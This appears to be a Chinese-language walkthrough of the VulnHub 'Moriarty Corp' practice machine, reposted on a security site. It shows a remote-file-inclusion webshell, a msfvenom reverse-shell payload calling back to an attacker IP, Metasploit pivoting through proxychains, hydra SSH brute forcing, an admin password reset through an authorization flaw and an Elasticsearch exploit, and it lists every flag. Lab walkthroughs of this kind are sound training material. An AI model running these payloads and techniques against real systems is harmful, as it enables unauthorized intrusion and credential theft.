MoriartyCorp靶机实战

admin
admin
admin
138532
文章
114
评论
2024年12月10日17:44:29评论4 views字数 2604阅读8分40秒阅读模式

靶场下载地址:

https://www.vulnhub.com/entry/boredhackerblog-moriarty-copy%2C456/

信息搜集

MoriartyCorp靶机实战

一、Nmap进行扫描

nmap -sP 192.168.128.0/24  #对自己的靶机网段进行存活探测,获取靶机地址nmap -T4 -A -p- 192.168.128.137  #对目标进行全端口扫描

MoriartyCorp靶机实战

二、web服务探测
Flag1:
其中8000端口为提交flag的地方,无需对此进行攻击尝试对9000端口的页面进行测试,他是一个Portainer登录页面Portainer是一个可视化的容器镜像的图形管理工具,利用Portainer可以轻松构建,管理和维护Docker环境

MoriartyCorp靶机实战

使用口令爆破等行为,未成功,暂时放弃访问192.168.128.137:8000,根据页面的信息,提交了第一个flagflag{start}

MoriartyCorp靶机实战

提交flag后,页面提示让访问80端口访问页面后,查看url发现疑似存在任意文件包含漏洞

MoriartyCorp靶机实战

MoriartyCorp靶机实战

MoriartyCorp靶机实战

MoriartyCorp靶机实战

Flag2:

通过测试发现页面存在远程文件包含漏洞远程加载一句话木马获取webshell翻取文件找到下一个flag:flag{the_game_is_on}

MoriartyCorp靶机实战

MoriartyCorp靶机实战

根据提交flag后的页面提示,目标在 172.17.0.3-254 一个内网段内我们通过上线msf进行探测生成msf反弹shell的文件msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.128.133 LPORT=6666 -f elf > shell.elf通过蚁剑上传shell.elf木马文件本地攻击机开启监听,成功返回shell

MoriartyCorp靶机实战

run autoroute -s 172.17.0.0/24 #创建跳板路由bg  #退出当前会话use auxiliary/server/socks_proxy run允许后修改:proxychains配置文件vim /etc/proxychains.conf

MoriartyCorp靶机实战

Flag3:

# 使用nmap对网段进行扫描探测proxychains nmap -sV -sT -Pn -T4 -p80,22,443,8080 --open 172.17.0.0/24通过探测发现 172.17.0.4 开启了80端口使用挂代理的方式,访问地址,上传webshell文件因需要输入密码,进行多次密码爆破尝试密码为:password使用蚁剑开启代理,连接webshell,从根目录获取到flagflag{picture_is_worth_1000_words}

MoriartyCorp靶机实战

MoriartyCorp靶机实战

MoriartyCorp靶机实战

提交flag后进入下一环节从页面信息中发现了内网开启了ssh服务,并显示了用户名和加密后的密码# 扫描内网查看目标proxychains nmap -sV -sT -Pn -T4 -p22 --open 172.17.0.0/24 通过探测发现 172.17.0.5开启了22端口

MoriartyCorp靶机实战

MoriartyCorp靶机实战

对获取到的密码进行解密63a9f0ea7bb98050796b649e85481845   root7b24afc8bc80e548d66c4e7ff72171c5   toor5f4dcc3b5aa765d61d8327deb882cf99   password21232f297a57a5a743894a0e4a801fc3   admin084e0343a0486ff05530df6c705c8bb4   guest697c6cc76fdbde5baccb7b3400391e30   MORIARTY8839cfc8a0f24eb155ae3f7f205f5cbc   MCORP35ac704fe1cc7807c914af478f20fd35   mcorpb27a803ed346fbbf6d2e2eb88df1c51b   weapons08552d48aa6d6d9c05dd67f1b4ba8747  moriarty将获取到的账号密码保存到字典中对目标172.17.0.5进行ssh爆破proxychains hydra -L user.txt -P pass.txt ssh://172.17.0.5成功爆破出root:weapons

MoriartyCorp靶机实战

Flag4:

ssh连接目标proxychains ssh root@172.17.0.5获取到下一个flag:flag{what_weapons}

MoriartyCorp靶机实战

提交flag后获得了新的信息新的目标不在80端口,它可能在443,8000,8080,8888它的账号密码是:username: buyer13password: arms13# 再次进行端口探测,寻找新的目标proxychains nmap -sV -sT -Pn -T4 -p443,8000,8080,8888 --open 172.17.0.0/24通过探测发现 172.17.0.6开启了8000端口使用账号密码登录通过聊天发现了管理员用户为admin

MoriartyCorp靶机实战

MoriartyCorp靶机实战

MoriartyCorp靶机实战

MoriartyCorp靶机实战

Flag5:

通过访问Change Password处,修改密码,发现存在越权漏洞通过越权漏洞修改管理员的密码为:123456使用admin用户重新访问:http://172.17.0.6:8000/alerts成功获取到flag:flag{on_the_move}

MoriartyCorp靶机实战

MoriartyCorp靶机实战

MoriartyCorp靶机实战

提交新的flag后进入下一环节此页面提示新的目标使用了ElasticsearchElasticsearch的默认端口为9200# 探测目标中开始9200的机器proxychains nmap -sV -sT -Pn -T4 -p9200 --open 172.17.0.0/24通过探测发现 172.17.0.7开启了9200端口服务

MoriartyCorp靶机实战

MoriartyCorp靶机实战

Flag6:

使用kali自带工具searchsploit寻找可利用漏洞searchsploit elasticsearch尝试36337.py脚本searchsploit -m 36337  #下载到当前目录proxychains python2 36337.py 172.17.0.7成功获取shell读取flag:flag{game_over}

MoriartyCorp靶机实战

MoriartyCorp靶机实战

结束

成功提交完所有的flagflag{start}flag{the_game_is_on}flag{picture_is_worth_1000_words}flag{what_weapons}flag{on_the_move}flag{game_over}

MoriartyCorp靶机实战

原文始发于微信公众号(渗透笔记):MoriartyCorp靶机实战

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月10日17:44:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MoriartyCorp靶机实战https://cn-sec.com/archives/2496982.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息